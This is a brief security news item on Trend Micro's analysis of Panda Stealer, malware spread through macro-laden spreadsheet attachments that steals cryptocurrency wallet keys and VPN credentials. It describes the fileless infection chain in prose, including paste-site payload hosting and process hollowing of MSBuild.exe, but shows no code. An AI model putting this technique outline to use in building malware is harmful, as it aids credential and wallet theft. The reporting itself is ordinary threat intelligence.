Security News > 2021 > May > Panda Stealer targets cryptocurrency wallets and VPN credentials via malicious XLS attachment
Bad actors put a new twist on an existing piece of malware to steal private keys for cryptocurrency accounts and other account credentials, according to analysis from Trend Micro.
Panda Stealer uses a fileless approach and looks for private keys and records of previous transactions from cryptocurrency wallets including Dash, Bytecoin, Litecoin and Ethereum, according to Trend Micro.
An XLSM attachment that contains macros that download a loader, which executes the stealer.
"Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the load of a.NET assembly within memory from a paste.ee URL. The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL.".
Morphisec's recent analysis also discovered that Panda Stealer has an infection chain that uses the same fileless distribution method as the "Fair" variant of Phobos ransomware to carry out memory-based attacks.
Trend Micro reports that Panda Stealer is a variant of Collector Stealer.